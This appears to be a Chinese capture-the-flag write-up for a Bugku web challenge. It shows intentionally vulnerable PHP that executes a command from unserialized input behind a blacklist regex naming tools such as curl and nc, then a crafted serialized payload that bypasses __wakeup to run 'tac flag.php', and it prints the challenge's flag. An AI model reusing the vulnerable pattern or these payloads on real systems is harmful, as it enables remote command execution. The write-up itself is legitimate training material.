Bugku Web 安慰奖

Bugku Web 安慰奖

  进入场景一片空白，查看源码发现YmFja3Vwcw==用base64解码得到backups，所以需要查看备份文件，用御剑扫描网站页面，发现了index.php.bak，访问后得到了一段如下的代码

<?php
header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗？<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧，hhh！</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

  分析可知我们需要传入code参数，内容是一段序列化的代码，代码在传入之后会被执行，以此构建payload,同时可以发现通过正则式过滤掉了一些输入，发现tac没有被过滤因此使用tac命令

<?php

class ctf{
    protected $username='admin';
    protected $cmd='tac flag.php';
}
$ctf=new ctf();
echo serialize($ctf);
;?>

运行后得到
O:3:"ctf":2:{s:11:"*username";s:5:"admin";s:6:"*cmd";s:12:"tac flag.php";}
为了绕过_wakeup原理：当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。，将对象数改为大于3的，同时为了绕过protected，在变量名前后加上%00，此时构造好的URL为http://114.67.246.176:11386/?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac%20flag.php";}
之后便得到了flag
flag{Unser1alize_and_2CE_Add}